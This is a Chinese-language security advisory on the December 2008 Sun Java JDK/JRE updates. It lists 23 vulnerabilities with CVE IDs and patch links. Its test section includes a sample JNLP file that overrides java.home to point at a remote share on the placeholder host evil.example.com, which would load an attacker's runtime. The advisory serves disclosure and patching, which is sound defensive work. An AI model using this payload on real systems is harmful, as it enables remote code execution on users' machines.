安全研究

安全漏洞
Sun Java JDK/JRE安全更新修复多个漏洞

发布日期:2008-12-03
更新日期:2008-12-08

受影响系统:
Sun JDK <= 6 Update 10
Sun JDK <= 5.0 Update 16
Sun JRE <= 6 Update 10
Sun JRE <= 5.0 Update 16
Sun SDK 1.4.2
Sun SDK 1.3.1
不受影响系统:
Sun JDK 6 Update 11
Sun JDK 5.0 Update 17
Sun JRE 6 Update 11
Sun JRE 5.0 Update 17
Sun SDK 1.4.2_19
Sun SDK 1.3.1_24
描述:
BUGTRAQ  ID: 32620,32608
CVE(CAN) ID: CVE-2008-5339,CVE-2008-5340,CVE-2008-5341,CVE-2008-5342,CVE-2008-5343,CVE-2008-5344,CVE-2008-5345,CVE-2008-5346,CVE-2008-5347,CVE-2008-5348,CVE-2008-5349,CVE-2008-5350,CVE-2008-5351,CVE-2008-5352,CVE-2008-5353,CVE-2008-5354,CVE-2008-5355,CVE-2008-5356,CVE-2008-5357,CVE-2008-5358,CVE-2008-5359,CVE-2008-5360,CVE-2008-2086

Solaris系统的Java运行时环境(JRE)为JAVA应用程序提供可靠的运行环境。

Sun Java中的多个安全漏洞可能允许恶意用户绕过某些安全限制、泄露系统信息、导致拒绝服务或完全入侵有漏洞的系统。

1) JRE创建了名称不过随机的临时文件,这可能导致在受影响的系统上写入任意JAR文件并执行有限的操作。

2) Java AWT库在处理图形模型时存在错误,在ConvolveOp操作中使用的特制Raster图形模型可能导致堆溢出。

3) Java Web Start在处理某些GIF头值时的错误可能允许通过特制的splash logo导致内存破坏。

4) 处理TrueType字体时的整数溢出可能导致堆溢出。

5) JRE中的错误可能导致创建到任意主机的网络连接。

6) 启动Java Web Start应用程序时的错误可能允许不可信任的应用程序以当前用户的权限读写或执行本地文件。

7) 不可信任的Java Web Start应用程序可以获取当前用户名和Java Web Start缓存的位置。

8) Java Web Start中的错误可能允许通过特制的JNLP文件修改系统属性,如java.home、java.ext.dirs和user.home。

9) Java Web Start和Java Plug-in中的错误可能导致劫持HTTP会话。

10) JRE applet类加载功能中的错误可能导致读取任意文件和创建到任意主机的网络连接。

11) Java Web Start BasicService中的错误可能导致在用户浏览器中打开任意本地文件。

12) Java Update机制没有检查下载的更新软件包的数字签名,这可能允许通过中间人或DNS伪造攻击执行任意代码。

13) 在处理JAR文件的Main-Class清单项时的边界错误可能允许通过特制的JAR文件导致栈溢出。

14) 还原序列号日历对象时的错误可能允许不可信任的Java applet读写或执行本地文件。

15) JRE中的整数溢出可能允许通过特制的Pack200压缩JAR文件导致堆溢出。

16) UTF-8解码器接受长于最短表单的编码,这可能导致使用解码器的应用程序通过特制URI接受无效的序列和泄露敏感信息。

17) JRE中的错误可能允许列出用户主目录的内容。

18) 处理RSA公钥时的错误可能导致消耗大量CPU资源。

19) JRE Kerberos认证机制中的错误可能导致耗尽操作系统资源。

20) JAX-WS和JAXB JRE软件包中的错误可能允许不可信任的Java applet读写或执行本地文件。

21) 处理ZIP文件时的错误可能导致泄露主机进程的任意内存位置。

22) 从本地文件系统所加载的恶意代码可能获取对本地主机的网络访问。

23) 处理TrueType字体时的边界错误可能导致堆溢出。

<*来源:Peter Csepely
        Billy Rios
        Peter Csepely
  
  链接:http://secunia.com/advisories/32991/
        http://marc.info/?l=bugtraq&m=122849475831735&w=2
        http://marc.info/?l=bugtraq&m=122849417430613&w=2
        http://marc.info/?l=bugtraq&m=122840935609861&w=2
        http://www.us-cert.gov/cas/techalerts/TA08-340A.html
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=760
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=759
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=758
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=757
        https://www.redhat.com/support/errata/RHSA-2008-1018.html
        https://www.redhat.com/support/errata/RHSA-2008-1025.html
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246386-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246366-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246346-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246286-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246266-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-245246-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-244992-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-244991-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-244990-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-244989-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-244988-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-244987-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-244986-1
        https://www.redhat.com/support/errata/RHSA-2009-1505.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
    <information>
      <title>Trusted Application</title>
      <vendor>Trusted Vendor</vendor>
      <description>Trusted Application by Trusted Vendor</description>
      <homepage href="http://trusted.example.org/" />
      <offline-allowed />
    </information>
    <security><all-permissions /></security>
    <resources>
      <j2se version="1.5+" />
      <!-- Next line overrides the JRE's java.home System property -->
      <property name="java.home" value="\\evil.example.com\jre" />
      <jar href="signed-and-trusted-jce-dependent-library.jar" />
    </resources>
    <application-desc main-class="org.example.trusted.app.StartApp" />
  </jnlp>

建议:
厂商补丁:

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2008:1025-01)以及相应补丁:
RHSA-2008:1025-01:Critical: java-1.5.0-sun security update
链接:https://www.redhat.com/support/errata/RHSA-2008-1025.html

Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-246387)以及相应补丁:
Sun-Alert-246387:A Security Vulnerability in the Java Runtime Environment may Allow Code Loaded From the Local Filesystem to Access LocalHost
链接:http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1

补丁下载:
http://java.sun.com/javase/downloads/index.jsp
http://java.sun.com/javase/downloads/index_jdk5.jsp
http://java.sun.com/j2se/1.4.2/download.html
http://java.sun.com/j2se/1.3/download.html

浏览次数:3078
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障